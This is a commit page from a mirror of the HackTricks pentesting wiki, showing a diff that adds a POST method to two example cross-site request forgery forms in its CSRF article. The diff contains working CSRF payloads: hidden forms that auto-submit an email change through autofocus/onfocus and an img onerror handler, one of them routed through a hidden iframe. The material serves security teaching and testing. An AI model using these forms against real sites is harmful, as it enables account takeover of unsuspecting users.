Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add missing HTML form methods for POST exploits

Browse source 
"Form POST request" and "Form POST request through iframe" now have the correct POST method.
This commit is contained in:
Matthew Prain 2023-05-05 10:24:18 +10:00 committed by GitHub
parent c469ce05ac
commit ac9e066bb6
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
pentesting-web/csrf-cross-site-request-forgery.md
View file

@ -237,7 +237,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://victim.net/email/change-email" id="csrfform">
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
@ -258,7 +258,7 @@ The request is sent through the iframe withuot reloading the page
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form action="/change-email" id="csrfform" target="csrfframe">
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>